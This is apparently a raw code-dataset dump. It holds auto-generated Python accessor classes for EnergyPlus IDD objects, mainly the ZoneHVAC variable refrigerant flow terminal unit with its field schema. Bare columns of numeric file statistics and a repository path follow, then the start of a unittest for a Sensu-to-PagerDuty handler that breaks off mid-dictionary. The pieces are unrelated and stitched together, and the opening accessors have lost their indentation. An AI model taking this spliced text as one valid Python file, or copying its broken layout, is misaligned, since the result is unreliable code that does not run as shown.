Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_5_name` or None if not set
"""
return self["Component 5 Name"]
@component_5_name.setter
def component_5_name(self, value=None):
"""Corresponds to IDD field `Component 5 Name`"""
self["Component 5 Name"] = value
@property
def component_6_object_type(self):
"""field `Component 6 Object Type`
Args:
value (str): value for IDD Field `Component 6 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_6_object_type` or None if not set
"""
return self["Component 6 Object Type"]
@component_6_object_type.setter
def component_6_object_type(self, value=None):
"""Corresponds to IDD field `Component 6 Object Type`"""
self["Component 6 Object Type"] = value
@property
def component_6_name(self):
"""field `Component 6 Name`
Args:
value (str): value for IDD Field `Component 6 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_6_name` or None if not set
"""
return self["Component 6 Name"]
@component_6_name.setter
def component_6_name(self, value=None):
"""Corresponds to IDD field `Component 6 Name`"""
self["Component 6 Name"] = value
@property
def component_7_object_type(self):
"""field `Component 7 Object Type`
Args:
value (str): value for IDD Field `Component 7 Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `component_7_object_type` or None if not set
"""
return self["Component 7 Object Type"]
@component_7_object_type.setter
def component_7_object_type(self, value=None):
"""Corresponds to IDD field `Component 7 Object Type`"""
self["Component 7 Object Type"] = value
@property
def component_7_name(self):
    """IDD field `Component 7 Name`.

    Args:
        value (str): value for IDD Field `Component 7 Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `component_7_name` or None if not set
    """
    idd_field = "Component 7 Name"
    return self[idd_field]

@component_7_name.setter
def component_7_name(self, value=None):
    """Set IDD field `Component 7 Name` to *value* (None clears it)."""
    idd_field = "Component 7 Name"
    self[idd_field] = value
@property
def component_8_object_type(self):
    """IDD field `Component 8 Object Type`.

    Args:
        value (str): value for IDD Field `Component 8 Object Type`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `component_8_object_type` or None if not set
    """
    idd_field = "Component 8 Object Type"
    return self[idd_field]

@component_8_object_type.setter
def component_8_object_type(self, value=None):
    """Set IDD field `Component 8 Object Type` to *value* (None clears it)."""
    idd_field = "Component 8 Object Type"
    self[idd_field] = value
@property
def component_8_name(self):
    """IDD field `Component 8 Name`.

    Args:
        value (str): value for IDD Field `Component 8 Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `component_8_name` or None if not set
    """
    idd_field = "Component 8 Name"
    return self[idd_field]

@component_8_name.setter
def component_8_name(self, value=None):
    """Set IDD field `Component 8 Name` to *value* (None clears it)."""
    idd_field = "Component 8 Name"
    self[idd_field] = value
class ZoneHvacTerminalUnitVariableRefrigerantFlow(DataObject):

    """Corresponds to IDD object `ZoneHVAC:TerminalUnit:VariableRefrigerantFlow`.

    Zone terminal unit with variable refrigerant flow (VRF) DX cooling and heating coils
    (air-to-air heat pump). The VRF terminal units are served by an
    AirConditioner:VariableRefrigerantFlow system.

    All accessors below delegate to ``DataObject.__getitem__`` /
    ``__setitem__``, which validate values against ``_schema``; setters raise
    ``ValueError`` for values that violate the field's schema entry.
    """

    # Auto-generated IDD schema. The DataObject base class reads this to
    # validate field values, apply defaults, and map between the IDD field
    # names (e.g. "Cooling Supply Air Flow Rate") and the python attribute
    # names (e.g. cooling_supply_air_flow_rate). Note: 'minimum>' denotes an
    # exclusive lower bound, 'minimum' an inclusive one.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'zone terminal unit name',
                                       {'name': u'Zone Terminal Unit Name',
                                        'pyname': u'zone_terminal_unit_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'terminal unit availability schedule',
                                       {'name': u'Terminal Unit Availability Schedule',
                                        'pyname': u'terminal_unit_availability_schedule',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'terminal unit air inlet node name',
                                       {'name': u'Terminal Unit Air Inlet Node Name',
                                        'pyname': u'terminal_unit_air_inlet_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'terminal unit air outlet node name',
                                       {'name': u'Terminal Unit Air Outlet Node Name',
                                        'pyname': u'terminal_unit_air_outlet_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'cooling supply air flow rate',
                                       {'name': u'Cooling Supply Air Flow Rate',
                                        'pyname': u'cooling_supply_air_flow_rate',
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': True,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'no cooling supply air flow rate',
                                       {'name': u'No Cooling Supply Air Flow Rate',
                                        'pyname': u'no_cooling_supply_air_flow_rate',
                                        'required-field': False,
                                        'autosizable': True,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'heating supply air flow rate',
                                       {'name': u'Heating Supply Air Flow Rate',
                                        'pyname': u'heating_supply_air_flow_rate',
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': True,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'no heating supply air flow rate',
                                       {'name': u'No Heating Supply Air Flow Rate',
                                        'pyname': u'no_heating_supply_air_flow_rate',
                                        'required-field': False,
                                        'autosizable': True,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'cooling outdoor air flow rate',
                                       {'name': u'Cooling Outdoor Air Flow Rate',
                                        'pyname': u'cooling_outdoor_air_flow_rate',
                                        'required-field': False,
                                        'autosizable': True,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'heating outdoor air flow rate',
                                       {'name': u'Heating Outdoor Air Flow Rate',
                                        'pyname': u'heating_outdoor_air_flow_rate',
                                        'required-field': False,
                                        'autosizable': True,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'no load outdoor air flow rate',
                                       {'name': u'No Load Outdoor Air Flow Rate',
                                        'pyname': u'no_load_outdoor_air_flow_rate',
                                        'required-field': False,
                                        'autosizable': True,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'supply air fan operating mode schedule name',
                                       {'name': u'Supply Air Fan Operating Mode Schedule Name',
                                        'pyname': u'supply_air_fan_operating_mode_schedule_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'supply air fan placement',
                                       {'name': u'Supply Air Fan Placement',
                                        'pyname': u'supply_air_fan_placement',
                                        'default': u'BlowThrough',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'BlowThrough',
                                                            u'DrawThrough'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'supply air fan object type',
                                       {'name': u'Supply Air Fan Object Type',
                                        'pyname': u'supply_air_fan_object_type',
                                        'default': u'Fan:ConstantVolume',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Fan:OnOff',
                                                            u'Fan:ConstantVolume',
                                                            u'Fan:VariableVolume'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'supply air fan object name',
                                       {'name': u'Supply Air Fan Object Name',
                                        'pyname': u'supply_air_fan_object_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'outside air mixer object type',
                                       {'name': u'Outside Air Mixer Object Type',
                                        'pyname': u'outside_air_mixer_object_type',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'OutdoorAir:Mixer'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'outside air mixer object name',
                                       {'name': u'Outside Air Mixer Object Name',
                                        'pyname': u'outside_air_mixer_object_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'cooling coil object type',
                                       {'name': u'Cooling Coil Object Type',
                                        'pyname': u'cooling_coil_object_type',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Coil:Cooling:DX:VariableRefrigerantFlow',
                                                            u'Coil:Cooling:DX:VariableRefrigerantFlow:FluidTemperatureControl'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'cooling coil object name',
                                       {'name': u'Cooling Coil Object Name',
                                        'pyname': u'cooling_coil_object_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'heating coil object type',
                                       {'name': u'Heating Coil Object Type',
                                        'pyname': u'heating_coil_object_type',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Coil:Heating:DX:VariableRefrigerantFlow',
                                                            u'Coil:Heating:DX:VariableRefrigerantFlow:FluidTemperatureControl'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'heating coil object name',
                                       {'name': u'Heating Coil Object Name',
                                        'pyname': u'heating_coil_object_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'zone terminal unit on parasitic electric energy use',
                                       {'name': u'Zone Terminal Unit On Parasitic Electric Energy Use',
                                        'pyname': u'zone_terminal_unit_on_parasitic_electric_energy_use',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W'}),
                                      (u'zone terminal unit off parasitic electric energy use',
                                       {'name': u'Zone Terminal Unit Off Parasitic Electric Energy Use',
                                        'pyname': u'zone_terminal_unit_off_parasitic_electric_energy_use',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W'}),
                                      (u'rated heating capacity sizing ratio',
                                       {'name': u'Rated Heating Capacity Sizing Ratio',
                                        'pyname': u'rated_heating_capacity_sizing_ratio',
                                        'default': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 1.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/W'}),
                                      (u'availability manager list name',
                                       {'name': u'Availability Manager List Name',
                                        'pyname': u'availability_manager_list_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'design specification zonehvac sizing object name',
                                       {'name': u'Design Specification ZoneHVAC Sizing Object Name',
                                        'pyname': u'design_specification_zonehvac_sizing_object_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'})]),
               'format': None,
               'group': u'Zone HVAC Forced Air Units',
               'min-fields': 19,
               'name': u'ZoneHVAC:TerminalUnit:VariableRefrigerantFlow',
               'pyname': u'ZoneHvacTerminalUnitVariableRefrigerantFlow',
               'required-object': False,
               'unique-object': False}

    @property
    def zone_terminal_unit_name(self):
        """field `Zone Terminal Unit Name`

        Args:
            value (str): value for IDD Field `Zone Terminal Unit Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `zone_terminal_unit_name` or None if not set
        """
        return self["Zone Terminal Unit Name"]

    @zone_terminal_unit_name.setter
    def zone_terminal_unit_name(self, value=None):
        """Corresponds to IDD field `Zone Terminal Unit Name`"""
        self["Zone Terminal Unit Name"] = value

    @property
    def terminal_unit_availability_schedule(self):
        """field `Terminal Unit Availability Schedule`

        |  The unit is available the entire simulation if this field is left blank
        |  Schedule values of 0 denote the unit is off.

        Args:
            value (str): value for IDD Field `Terminal Unit Availability Schedule`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `terminal_unit_availability_schedule` or None if not set
        """
        return self["Terminal Unit Availability Schedule"]

    @terminal_unit_availability_schedule.setter
    def terminal_unit_availability_schedule(self, value=None):
        """Corresponds to IDD field `Terminal Unit Availability Schedule`"""
        self["Terminal Unit Availability Schedule"] = value

    @property
    def terminal_unit_air_inlet_node_name(self):
        """field `Terminal Unit Air Inlet Node Name`

        |  the inlet node to the terminal unit

        Args:
            value (str): value for IDD Field `Terminal Unit Air Inlet Node Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `terminal_unit_air_inlet_node_name` or None if not set
        """
        return self["Terminal Unit Air Inlet Node Name"]

    @terminal_unit_air_inlet_node_name.setter
    def terminal_unit_air_inlet_node_name(self, value=None):
        """Corresponds to IDD field `Terminal Unit Air Inlet Node Name`"""
        self["Terminal Unit Air Inlet Node Name"] = value

    @property
    def terminal_unit_air_outlet_node_name(self):
        """field `Terminal Unit Air Outlet Node Name`

        |  the outlet node of the terminal unit

        Args:
            value (str): value for IDD Field `Terminal Unit Air Outlet Node Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `terminal_unit_air_outlet_node_name` or None if not set
        """
        return self["Terminal Unit Air Outlet Node Name"]

    @terminal_unit_air_outlet_node_name.setter
    def terminal_unit_air_outlet_node_name(self, value=None):
        """Corresponds to IDD field `Terminal Unit Air Outlet Node Name`"""
        self["Terminal Unit Air Outlet Node Name"] = value

    @property
    def cooling_supply_air_flow_rate(self):
        """field `Cooling Supply Air Flow Rate`

        |  Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `Cooling Supply Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `cooling_supply_air_flow_rate` or None if not set
        """
        return self["Cooling Supply Air Flow Rate"]

    @cooling_supply_air_flow_rate.setter
    def cooling_supply_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
        self["Cooling Supply Air Flow Rate"] = value

    @property
    def no_cooling_supply_air_flow_rate(self):
        """field `No Cooling Supply Air Flow Rate`

        |  Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `No Cooling Supply Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `no_cooling_supply_air_flow_rate` or None if not set
        """
        return self["No Cooling Supply Air Flow Rate"]

    @no_cooling_supply_air_flow_rate.setter
    def no_cooling_supply_air_flow_rate(self, value=None):
        """Corresponds to IDD field `No Cooling Supply Air Flow Rate`"""
        self["No Cooling Supply Air Flow Rate"] = value

    @property
    def heating_supply_air_flow_rate(self):
        """field `Heating Supply Air Flow Rate`

        |  Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `Heating Supply Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `heating_supply_air_flow_rate` or None if not set
        """
        return self["Heating Supply Air Flow Rate"]

    @heating_supply_air_flow_rate.setter
    def heating_supply_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Heating Supply Air Flow Rate`"""
        self["Heating Supply Air Flow Rate"] = value

    @property
    def no_heating_supply_air_flow_rate(self):
        """field `No Heating Supply Air Flow Rate`

        |  Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `No Heating Supply Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `no_heating_supply_air_flow_rate` or None if not set
        """
        return self["No Heating Supply Air Flow Rate"]

    @no_heating_supply_air_flow_rate.setter
    def no_heating_supply_air_flow_rate(self, value=None):
        """Corresponds to IDD field `No Heating Supply Air Flow Rate`"""
        self["No Heating Supply Air Flow Rate"] = value

    @property
    def cooling_outdoor_air_flow_rate(self):
        """field `Cooling Outdoor Air Flow Rate`

        |  Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `Cooling Outdoor Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `cooling_outdoor_air_flow_rate` or None if not set
        """
        return self["Cooling Outdoor Air Flow Rate"]

    @cooling_outdoor_air_flow_rate.setter
    def cooling_outdoor_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Cooling Outdoor Air Flow Rate`"""
        self["Cooling Outdoor Air Flow Rate"] = value

    @property
    def heating_outdoor_air_flow_rate(self):
        """field `Heating Outdoor Air Flow Rate`

        |  Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `Heating Outdoor Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `heating_outdoor_air_flow_rate` or None if not set
        """
        return self["Heating Outdoor Air Flow Rate"]

    @heating_outdoor_air_flow_rate.setter
    def heating_outdoor_air_flow_rate(self, value=None):
        """Corresponds to IDD field `Heating Outdoor Air Flow Rate`"""
        self["Heating Outdoor Air Flow Rate"] = value

    @property
    def no_load_outdoor_air_flow_rate(self):
        """field `No Load Outdoor Air Flow Rate`

        |  Units: m3/s

        Args:
            value (float or "Autosize"): value for IDD Field `No Load Outdoor Air Flow Rate`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float or "Autosize": the value of `no_load_outdoor_air_flow_rate` or None if not set
        """
        return self["No Load Outdoor Air Flow Rate"]

    @no_load_outdoor_air_flow_rate.setter
    def no_load_outdoor_air_flow_rate(self, value=None):
        """Corresponds to IDD field `No Load Outdoor Air Flow Rate`"""
        self["No Load Outdoor Air Flow Rate"] = value

    @property
    def supply_air_fan_operating_mode_schedule_name(self):
        """field `Supply Air Fan Operating Mode Schedule Name`

        Args:
            value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
        """
        return self["Supply Air Fan Operating Mode Schedule Name"]

    @supply_air_fan_operating_mode_schedule_name.setter
    def supply_air_fan_operating_mode_schedule_name(self, value=None):
        """Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
        Name`"""
        self["Supply Air Fan Operating Mode Schedule Name"] = value

    @property
    def supply_air_fan_placement(self):
        """field `Supply Air Fan Placement`

        |  Select fan placement as either blow through or draw through.
        |  Default value: BlowThrough

        Args:
            value (str): value for IDD Field `Supply Air Fan Placement`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `supply_air_fan_placement` or None if not set
        """
        return self["Supply Air Fan Placement"]

    @supply_air_fan_placement.setter
    def supply_air_fan_placement(self, value="BlowThrough"):
        """Corresponds to IDD field `Supply Air Fan Placement`"""
        self["Supply Air Fan Placement"] = value

    @property
    def supply_air_fan_object_type(self):
        """field `Supply Air Fan Object Type`

        |  Supply Air Fan Object Type must be
        |  Fan:OnOff or Fan:ConstantVolume
        |  if AirConditioner:VariableRefrigerantFlow
        |  is used to model VRF outdoor unit
        |  Supply Air Fan Object Type must be Fan:VariableVolume if
        |  AirConditioner:VariableRefrigerantFlow:FluidTemperatureControl
        |  is used to model VRF outdoor unit
        |  Default value: Fan:ConstantVolume

        Args:
            value (str): value for IDD Field `Supply Air Fan Object Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `supply_air_fan_object_type` or None if not set
        """
        return self["Supply Air Fan Object Type"]

    @supply_air_fan_object_type.setter
    def supply_air_fan_object_type(self, value="Fan:ConstantVolume"):
        """Corresponds to IDD field `Supply Air Fan Object Type`"""
        self["Supply Air Fan Object Type"] = value

    @property
    def supply_air_fan_object_name(self):
        """field `Supply Air Fan Object Name`

        Args:
            value (str): value for IDD Field `Supply Air Fan Object Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `supply_air_fan_object_name` or None if not set
        """
        return self["Supply Air Fan Object Name"]

    @supply_air_fan_object_name.setter
    def supply_air_fan_object_name(self, value=None):
        """Corresponds to IDD field `Supply Air Fan Object Name`"""
        self["Supply Air Fan Object Name"] = value

    @property
    def outside_air_mixer_object_type(self):
        """field `Outside Air Mixer Object Type`

        |  If this field is blank, and outside air mixer is not used.

        Args:
            value (str): value for IDD Field `Outside Air Mixer Object Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `outside_air_mixer_object_type` or None if not set
        """
        return self["Outside Air Mixer Object Type"]

    @outside_air_mixer_object_type.setter
    def outside_air_mixer_object_type(self, value=None):
        """Corresponds to IDD field `Outside Air Mixer Object Type`"""
        self["Outside Air Mixer Object Type"] = value

    @property
    def outside_air_mixer_object_name(self):
        """field `Outside Air Mixer Object Name`

        |  If this field is blank, and outside air mixer is not used.

        Args:
            value (str): value for IDD Field `Outside Air Mixer Object Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `outside_air_mixer_object_name` or None if not set
        """
        return self["Outside Air Mixer Object Name"]

    @outside_air_mixer_object_name.setter
    def outside_air_mixer_object_name(self, value=None):
        """Corresponds to IDD field `Outside Air Mixer Object Name`"""
        self["Outside Air Mixer Object Name"] = value

    @property
    def cooling_coil_object_type(self):
        """field `Cooling Coil Object Type`

        |  Cooling Coil Type must be Coil:Cooling:DX:VariableRefrigerantFlow
        |  if AirConditioner:VariableRefrigerantFlow is used
        |  to model VRF outdoor unit
        |  Cooling Coil Type must be
        |  Coil:Cooling:DX:VariableRefrigerantFlow:FluidTemperatureControl
        |  if AirConditioner:VariableRefrigerantFlow:FluidTemperatureControl
        |  is used to model VRF outdoor unit
        |  This field may be left blank if heating-only mode is used

        Args:
            value (str): value for IDD Field `Cooling Coil Object Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `cooling_coil_object_type` or None if not set
        """
        return self["Cooling Coil Object Type"]

    @cooling_coil_object_type.setter
    def cooling_coil_object_type(self, value=None):
        """Corresponds to IDD field `Cooling Coil Object Type`"""
        self["Cooling Coil Object Type"] = value

    @property
    def cooling_coil_object_name(self):
        """field `Cooling Coil Object Name`

        |  Cooling Coil Type must be Coil:Cooling:DX:VariableRefrigerantFlow
        |  This field may be left blank if heating-only mode is used

        Args:
            value (str): value for IDD Field `Cooling Coil Object Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `cooling_coil_object_name` or None if not set
        """
        return self["Cooling Coil Object Name"]

    @cooling_coil_object_name.setter
    def cooling_coil_object_name(self, value=None):
        """Corresponds to IDD field `Cooling Coil Object Name`"""
        self["Cooling Coil Object Name"] = value

    @property
    def heating_coil_object_type(self):
        """field `Heating Coil Object Type`

        |  Heating Coil Type must be Coil:Heating:DX:VariableRefrigerantFlow
        |  if AirConditioner:VariableRefrigerantFlow is used
        |  to model VRF outdoor unit
        |  Heating Coil Type must be
        |  Coil:Heating:DX:VariableRefrigerantFlow:FluidTemperatureControl
        |  if AirConditioner:VariableRefrigerantFlow:FluidTemperatureControl
        |  is used to model VRF outdoor unit
        |  This field may be left blank if cooling-only mode is used

        Args:
            value (str): value for IDD Field `Heating Coil Object Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `heating_coil_object_type` or None if not set
        """
        return self["Heating Coil Object Type"]

    @heating_coil_object_type.setter
    def heating_coil_object_type(self, value=None):
        """Corresponds to IDD field `Heating Coil Object Type`"""
        self["Heating Coil Object Type"] = value

    @property
    def heating_coil_object_name(self):
        """field `Heating Coil Object Name`

        |  Heating Coil Type must be Coil:Heating:DX:VariableRefrigerantFlow
        |  This field may be left blank if cooling-only mode is used

        Args:
            value (str): value for IDD Field `Heating Coil Object Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `heating_coil_object_name` or None if not set
        """
        return self["Heating Coil Object Name"]

    @heating_coil_object_name.setter
    def heating_coil_object_name(self, value=None):
        """Corresponds to IDD field `Heating Coil Object Name`"""
        self["Heating Coil Object Name"] = value

    @property
    def zone_terminal_unit_on_parasitic_electric_energy_use(self):
        """field `Zone Terminal Unit On Parasitic Electric Energy Use`

        |  Units: W

        Args:
            value (float): value for IDD Field `Zone Terminal Unit On Parasitic Electric Energy Use`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `zone_terminal_unit_on_parasitic_electric_energy_use` or None if not set
        """
        return self["Zone Terminal Unit On Parasitic Electric Energy Use"]

    @zone_terminal_unit_on_parasitic_electric_energy_use.setter
    def zone_terminal_unit_on_parasitic_electric_energy_use(self, value=None):
        """Corresponds to IDD field `Zone Terminal Unit On Parasitic Electric
        Energy Use`"""
        self["Zone Terminal Unit On Parasitic Electric Energy Use"] = value

    @property
    def zone_terminal_unit_off_parasitic_electric_energy_use(self):
        """field `Zone Terminal Unit Off Parasitic Electric Energy Use`

        |  Units: W

        Args:
            value (float): value for IDD Field `Zone Terminal Unit Off Parasitic Electric Energy Use`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `zone_terminal_unit_off_parasitic_electric_energy_use` or None if not set
        """
        return self["Zone Terminal Unit Off Parasitic Electric Energy Use"]

    @zone_terminal_unit_off_parasitic_electric_energy_use.setter
    def zone_terminal_unit_off_parasitic_electric_energy_use(self, value=None):
        """Corresponds to IDD field `Zone Terminal Unit Off Parasitic Electric
        Energy Use`"""
        self["Zone Terminal Unit Off Parasitic Electric Energy Use"] = value

    @property
    def rated_heating_capacity_sizing_ratio(self):
        """field `Rated Heating Capacity Sizing Ratio`

        |  If this terminal unit's heating coil is autosized, the heating capacity is sized
        |  to be equal to the cooling capacity multiplied by this sizing ratio.
        |  This input applies to the terminal unit heating coil and overrides the sizing
        |  ratio entered in the AirConditioner:VariableRefrigerantFlow object.
        |  Units: W/W
        |  Default value: 1.0
        |  value >= 1.0

        Args:
            value (float): value for IDD Field `Rated Heating Capacity Sizing Ratio`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `rated_heating_capacity_sizing_ratio` or None if not set
        """
        return self["Rated Heating Capacity Sizing Ratio"]

    @rated_heating_capacity_sizing_ratio.setter
    def rated_heating_capacity_sizing_ratio(self, value=1.0):
        """Corresponds to IDD field `Rated Heating Capacity Sizing Ratio`"""
        self["Rated Heating Capacity Sizing Ratio"] = value

    @property
    def availability_manager_list_name(self):
        """field `Availability Manager List Name`

        |  Enter the name of an AvailabilityManagerAssignmentList object.

        Args:
            value (str): value for IDD Field `Availability Manager List Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `availability_manager_list_name` or None if not set
        """
        return self["Availability Manager List Name"]

    @availability_manager_list_name.setter
    def availability_manager_list_name(self, value=None):
        """Corresponds to IDD field `Availability Manager List Name`"""
        self["Availability Manager List Name"] = value

    @property
    def design_specification_zonehvac_sizing_object_name(self):
        """field `Design Specification ZoneHVAC Sizing Object Name`

        |  Enter the name of a DesignSpecificationZoneHVACSizing object.

        Args:
            value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
        """
        return self["Design Specification ZoneHVAC Sizing Object Name"]

    @design_specification_zonehvac_sizing_object_name.setter
    def design_specification_zonehvac_sizing_object_name(self, value=None):
        """Corresponds to IDD field `Design Specification ZoneHVAC Sizing
        Object Name`"""
        self["Design Specification ZoneHVAC Sizing Object Name"] = value
| 42.061152
| 128
| 0.492846
| 41,926
| 436,763
| 5.010781
| 0.015074
| 0.030331
| 0.027437
| 0.023838
| 0.92393
| 0.877995
| 0.831161
| 0.797203
| 0.76771
| 0.734542
| 0
| 0.003812
| 0.430655
| 436,763
| 10,383
| 129
| 42.065203
| 0.841014
| 0.297152
| 0
| 0.747824
| 0
| 0
| 0.259436
| 0.042472
| 0
| 0
| 0
| 0
| 0
| 1
| 0.13288
| false
| 0
| 0.000637
| 0
| 0.206326
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79518f1609f6098dd1f2e2111b4633405f5f70e1
| 23,187
|
py
|
Python
|
test/test_handler.py
|
Jazun713/sensu-plugin-py-pagerduty
|
88f2d53aa07c88c05d9a50b5c99cda5225ac1fec
|
[
"MIT"
] | null | null | null |
test/test_handler.py
|
Jazun713/sensu-plugin-py-pagerduty
|
88f2d53aa07c88c05d9a50b5c99cda5225ac1fec
|
[
"MIT"
] | 1
|
2018-08-07T20:46:41.000Z
|
2019-01-10T23:25:14.000Z
|
test/test_handler.py
|
Jazun713/sensu-plugin-py-pagerduty
|
88f2d53aa07c88c05d9a50b5c99cda5225ac1fec
|
[
"MIT"
] | null | null | null |
import mock
import unittest
import json, logging
import mock
from pagerduty.handler import PagerdutyHandler
def event_no_teams():
    """Return a sample Sensu keepalive event with no `pager_team` entries.

    The payload mirrors what the handler reads from stdin: a `client`
    section, a `check` section, plus top-level `occurrences` and `action`.
    """
    client_section = {
        "name": "test_client",
        "address": "127.0.0.1",
        "keepalive": {
            "handler": "sensu_deregister",
            "thresholds": {"critical": 604800, "warning": 300},
        },
        "metrics": {
            "cpu": {"crit": 100, "warning": 90},
            "disk": {"crit": 5, "warning": 8},
            "memory": {"crit": 100, "warning": 90},
        },
        "pools": {},
        "services": {
            "octopus-deploy": {"service": "OctopusDeploy Tentacle"},
        },
        "subscriptions": [
            "win-svc-metrics",
            "octopus-deploy-service",
            "host-checks",
            "host-metrics",
            "client:test_client",
        ],
        "version": "1.2.0",
        "timestamp": 1529508402,
    }
    check_section = {
        "thresholds": {"warning": 300, "critical": 604800},
        "handler": "sensu_pagerduty",
        "name": "keepalive",
